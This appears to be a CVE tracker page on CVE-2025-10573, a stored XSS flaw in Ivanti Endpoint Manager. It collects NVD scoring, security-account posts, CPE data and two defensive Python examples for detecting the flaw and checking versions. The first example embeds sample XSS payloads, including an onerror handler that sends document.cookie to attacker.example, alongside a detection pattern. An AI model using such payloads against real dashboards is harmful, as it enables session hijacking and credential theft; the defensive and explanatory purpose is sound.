AI description
CVE-2025-10573 is a stored cross-site scripting (XSS) vulnerability in Ivanti Endpoint Manager (EPM) versions prior to 2024 SU4 SR1. It is a CWE-79 weakness: user-supplied input is not neutralized before it is placed into a generated web page. The primary EPM web service accepts endpoint enrollment without authentication, so a remote attacker can join fake managed endpoints to the EPM server and supply attacker-controlled endpoint data that the server later renders, without output encoding, into the administrator web dashboard. When an EPM administrator views the poisoned dashboard page, the injected JavaScript runs in the administrator's browser and can be used to hijack that session or act with the administrator's privileges. User interaction (an administrator viewing the affected page) is required. Scores differ by source: NVD's Primary CVSS 3.1 vector below (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) yields 6.1 (Medium), while the figure cited by Rapid7 and Censys in the posts on this page is 9.6 (Critical). Ivanti has released EPM 2024 SU4 SR1 to address the vulnerability.
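The mechanism described above, as an added example that is not part of this page or of Ivanti's code: a minimal Python model of the CWE-79 pattern (endpoint data supplied at enrollment concatenated straight into dashboard HTML) beside the output-encoded version, plus a hunting helper that flags inventory fields carrying markup. The inventory records, the field names (`device_name`, `os`) and the attacker host are constructed for the example and do not reflect the real EPM schema.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inventory, standing in for records that self-registering
# (possibly fake) endpoints push to the EPM server. Field names are assumptions.
INVENTORY = [
    {"device_name": "WKS-0417", "os": "Windows 11 Pro"},
    {"device_name": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
     "os": "Windows 10"},
    {"device_name": "SRV-DB01\"><script>alert(document.domain)</script>",
     "os": "Windows Server 2022"},
]

def render_row_vulnerable(rec):
    """CWE-79 pattern: untrusted endpoint data concatenated into dashboard HTML."""
    return f"<tr><td>{rec['device_name']}</td><td>{rec['os']}</td></tr>"

def render_row_hardened(rec):
    """Same row with contextual output encoding: each value is HTML-escaped for the
    element-content context before it is embedded, so it can only ever be text."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(rec["device_name"]), html.escape(rec["os"])
    )

class _TagAudit(HTMLParser):
    """Collects tags other than the row template's own, and any on* event handler."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("tr", "td"):
            self.findings.append(tag)
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")

def live_markup(rendered_html):
    """Return the executable markup that reached the rendered row.
    An empty list means the browser will see text only."""
    audit = _TagAudit()
    audit.feed(rendered_html)
    audit.close()
    return audit.findings

# Hunting heuristic for raw inventory values: tags that can carry script, inline
# event handlers, or javascript: URLs. A triage aid; tune it per environment.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed)\b|\bon[a-z]+\s*=|javascript:",
    re.IGNORECASE,
)

def flag_suspicious(records, fields=("device_name", "os")):
    """Return (record index, field, value) for inventory fields that look like injected
    markup. A hit on a device that enrolled without authentication is an indicator of
    attempted CVE-2025-10573 exploitation and belongs in an IR ticket."""
    hits = []
    for i, rec in enumerate(records):
        for f in fields:
            value = rec.get(f, "")
            if SUSPICIOUS.search(value):
                hits.append((i, f, value))
    return hits

if __name__ == "__main__":
    for rec in INVENTORY:
        vuln, fixed = render_row_vulnerable(rec), render_row_hardened(rec)
        print("vulnerable:", vuln, "->", live_markup(vuln))
        print("hardened  :", fixed, "->", live_markup(fixed))
    print("suspicious inventory fields:", flag_suspicious(INVENTORY))
```

`live_markup` parses the rendered row with the standard-library HTML parser rather than grepping it, because escaped text such as `onerror=` is harmless once it is no longer inside a tag; only a real start tag or event-handler attribute counts. `flag_suspicious` is the opposite tool: it runs over raw stored values, where any of those patterns is worth a look.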
- Description
- Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required.
- Source
- 3c1d8aa1-5a33-4ea4-8992-aadd6440af75
- NVD status
- Analyzed
- Products
- endpoint_manager
CVSS 3.1
- Type
- Primary
- Base score
- 6.1
- Impact score
- 2.7
- Exploitability score
- 2.8
- Vector string
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Severity
- MEDIUM
- 3c1d8aa1-5a33-4ea4-8992-aadd6440af75
- CWE-79
- Hype score
- Not currently trending
🚨 Ivanti Endpoint Manager - Dec 19, 2025 Critical vulnerabilities and security advisory for Ivanti Endpoint Manager, including CVE-2025-10573 and related remote code execution risks. Check out our Threat Intelligence Platform: https://t.co/QuwNtEhw6z... https://t.co/T18FWuk
@transilienceai
19 Dec 2025
4 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 Critical vulnerability alert: Ivanti Endpoint Manager (EPM) – CVE-2025-10573. ThaiCERT has detected a report of a critical-severity vulnerability, number CVE-202
@ThaiCERTByNCSA
15 Dec 2025
49 Impressions
1 Retweet
0 Likes
0 Bookmarks
0 Replies
0 Quotes
CVE-2025-10573 Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an admi… https://t.co/Offkbsj1tT
@CVEnew
14 Dec 2025
227 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 CVE-2025-10573 | Ivanti Endpoint Manager Critical stored XSS (CVSS 9.6) → unauth JS in admin sessions. 🔧 Fixed in Ivanti EPM 2024 SU4 SR1 (Dec 9) 📊 Censys sees 1,898 exposed EPM instances, 80 vulnerable ➡️ Upgrade immediately. 🔗https://t.co/4EyNonmMaM #CVE2
@censysio
12 Dec 2025
5862 Impressions
20 Retweets
72 Likes
29 Bookmarks
6 Replies
0 Quotes
🔴 CVE-2025-10573: Ivanti EPM Stored XSS Hijacks Admin Sessions Ivanti Endpoint Manager has critical stored XSS (CVSS 9.0) that escalates to full admin takeover. What's clever: attackers inject malicious scripts into EPM's web interface that execute when administrators view
@the_c_protocol
11 Dec 2025
52 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti EPM XSS nightmare (CVE-2025-10573): Unauth attackers drop JS bombs for code exec. Fortinet's duo of auth bypasses (FortiOS et al.) join the party. SAP's 14 vulns too—patch parade! https://t.co/4SUomvqmXw #Ivanti #Fortinet #SAPSecurity
@ImperialTechSvc
11 Dec 2025
41 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
X crew, threats don't take holidays. Today's drop: Microsoft's mega Patch Tuesday slams 56 flaws (1 zero-day exploited!), ransomware exploding on hypervisors (+700%), and a sneaky new CastleLoader malware variant slinging Python payloads. Plus, Ivanti's XSS bomb (CVE-2025-10573)
@ImperialTechSvc
11 Dec 2025
35 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti warns of critical code execution flaw in Endpoint Manager https://t.co/v3sYbERyk9 #Cross-siteScripting #cve-2025-10573 #RemoteCodeExecution
@wizconsults
10 Dec 2025
43 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti releases patches for critical Endpoint Manager flaw CVE-2025-10573 allowing remote unauthenticated JavaScript code execution in admin sessions. PoC exploit reported, updates urged. #Vulnerability https://t.co/GqJMv8I5Rn
@threatcluster
10 Dec 2025
50 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 We are warning of a critical vulnerability in Ivanti Endpoint Manager (EPM), CVE-2025-10573. It is a Stored XSS flaw that allows a remote unauthenticated attacker to insert malicious JavaScript into the administrator interface via fale
@GOVCERT_CZ
10 Dec 2025
598 Impressions
0 Retweets
3 Likes
0 Bookmarks
0 Replies
0 Quotes
Ivanti EPM suffers stored XSS (CVE-2025-10573, CVSS 9.6) enabling remote code execution - patch now and check UI sanitization. https://t.co/eACfm4FS7t #infosec #Ivanti
@_UncleHacker_
10 Dec 2025
16 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
Security Bulletin: Ivanti EPM (CVE-2025-10573, CVSS 9.6) contains a stored XSS flaw that runs attacker scripts when admins load compromised fields. Patch to 2024 SU4 SR1 now. #ThreatIntel #RedLeggCTI https://t.co/ArD4i6n8du
@RedLegg
9 Dec 2025
81 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
🚨 Earlier this year, Rapid7 researchers discovered a stored cross-site scripting (XSS) vuln. in #Ivanti Endpoint Manager (EPM) – affecting versions 2024 SU4 and below. Now patched, CVE-2025-10573 has been assigned a CVSS score of 9.6. More in our blog: https://t.co/FtdADlLL
@rapid7
9 Dec 2025
9141 Impressions
22 Retweets
50 Likes
18 Bookmarks
2 Replies
0 Quotes
[CVE-2025-10573: CRITICAL] Critical stored XSS vulnerability in Ivanti Endpoint Manager (pre-2024 SU4 SR1) lets remote attacker run malicious JavaScript in admin session. User interaction needed.#cve,CVE-2025-10573,#cybersecurity https://t.co/lKnf20YeQn https://t.co/4JKsBO3PDE
@CveFindCom
9 Dec 2025
106 Impressions
0 Retweets
0 Likes
0 Bookmarks
0 Replies
0 Quotes
[
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7ABDE6FE-56CC-4A46-91F2-2F54C3EC6A75",
"versionEndExcluding": "2024",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*",
"matchCriteriaId": "6C7283FE-C10A-4E37-B004-15FB0CAC49A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*",
"matchCriteriaId": "FC51EEA2-1C4C-4069-9704-7ACFE4773930",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*",
"matchCriteriaId": "E1EF5E1B-9377-49D3-9BE3-62FC78E666A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*",
"matchCriteriaId": "749AADDA-834D-4EC0-B7FF-E136FD1984F7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*",
"matchCriteriaId": "698BF7A1-62A1-45B5-BF08-AB3F3AA0245C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*",
"matchCriteriaId": "4902A745-E7CB-4FC9-9BCB-89EFAB643237",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
]
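To turn the cpeMatch list above into a check, here is an added Python example (not NVD's or Ivanti's code) that evaluates an installed product's CPE 2.3 name against this configuration: exact-version entries must match component for component, and the wildcard-version entry is narrowed by its `versionEndExcluding` bound. The configuration is copied inline with the `matchCriteriaId` values dropped. The `su4_security_release_1` update string used for the fixed build is assumed by analogy with the page's `su3_security_release_1` entry, and the version comparison is numeric-aware but not a full implementation of NVD's matching rules.

```python
import re

# The NVD configuration published for CVE-2025-10573, as shown on this page, copied
# inline (matchCriteriaId values dropped) so the check runs offline.
NVD_CONFIGURATIONS = [{
    "nodes": [{
        "operator": "OR",
        "negate": False,
        "cpeMatch": [
            {"criteria": "cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*",
             "versionEndExcluding": "2024", "vulnerable": True},
            {"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*", "vulnerable": True},
            {"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su1:*:*:*:*:*:*", "vulnerable": True},
            {"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su2:*:*:*:*:*:*", "vulnerable": True},
            {"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3:*:*:*:*:*:*", "vulnerable": True},
            {"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su3_security_release_1:*:*:*:*:*:*",
             "vulnerable": True},
            {"criteria": "cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*", "vulnerable": True},
        ],
    }],
}]

def split_cpe(cpe):
    """Split a CPE 2.3 formatted string into its 13 components, honouring '\\:' escapes."""
    parts, cur, i = [], "", 0
    while i < len(cpe):
        if cpe[i] == "\\" and i + 1 < len(cpe):
            cur += cpe[i:i + 2]
            i += 2
            continue
        if cpe[i] == ":":
            parts.append(cur)
            cur = ""
        else:
            cur += cpe[i]
        i += 1
    parts.append(cur)
    if len(parts) != 13:
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe}")
    return parts

def version_key(v):
    """Numeric-aware sort key: '2024' > '2022', '11.0.6' < '2024'. Chunks are tagged
    so ints and strings are never compared directly."""
    return tuple((0, int(x)) if x.isdigit() else (1, x)
                 for x in re.split(r"(\d+)", v) if x)

def cpe_match(entry, target):
    """Does one cpeMatch entry apply to the target CPE? Non-version components must be
    equal or '*' in the criteria; an exact criteria version must equal the target's;
    a '*' criteria version is narrowed by the versionStart*/versionEnd* bounds."""
    crit, tgt = split_cpe(entry["criteria"]), split_cpe(target)
    for i, (c, t) in enumerate(zip(crit, tgt)):
        if i == 5:          # version component is handled below
            continue
        if c != "*" and c != t:
            return False
    if crit[5] != "*":
        return crit[5] == tgt[5]
    if tgt[5] in ("*", "-"):
        return False        # target version unknown: a range cannot be evaluated
    k = version_key(tgt[5])
    if "versionStartIncluding" in entry and k < version_key(entry["versionStartIncluding"]):
        return False
    if "versionStartExcluding" in entry and k <= version_key(entry["versionStartExcluding"]):
        return False
    if "versionEndIncluding" in entry and k > version_key(entry["versionEndIncluding"]):
        return False
    if "versionEndExcluding" in entry and k >= version_key(entry["versionEndExcluding"]):
        return False
    return True

def is_vulnerable(configurations, target):
    """Evaluate NVD 'configurations' for a target CPE. Each node combines its cpeMatch
    entries with its operator (and optional negate); a configuration with several
    nodes combines them with its own operator (treated as AND when unspecified)."""
    for conf in configurations:
        node_results = []
        for node in conf["nodes"]:
            matches = [cpe_match(m, target) and m.get("vulnerable", False)
                       for m in node["cpeMatch"]]
            hit = any(matches) if node.get("operator", "OR") == "OR" else all(matches)
            node_results.append(not hit if node.get("negate") else hit)
        conf_hit = any(node_results) if conf.get("operator") == "OR" else all(node_results)
        if conf_hit:
            return True
    return False

if __name__ == "__main__":
    for cpe in ("cpe:2.3:a:ivanti:endpoint_manager:2022:su5:*:*:*:*:*:*",
                "cpe:2.3:a:ivanti:endpoint_manager:2024:su4:*:*:*:*:*:*",
                "cpe:2.3:a:ivanti:endpoint_manager:2024:su4_security_release_1:*:*:*:*:*:*"):
        print(cpe, "->", "vulnerable" if is_vulnerable(NVD_CONFIGURATIONS, cpe) else "not affected")
```

The fixed build is not matched by any exact entry, and the wildcard entry excludes it because its version component `2024` is not below the `versionEndExcluding` bound of `2024`; every pre-2024 release is caught by that same wildcard entry regardless of update string. Feed the function the CPE name your asset inventory records for each EPM core server to get a per-host verdict.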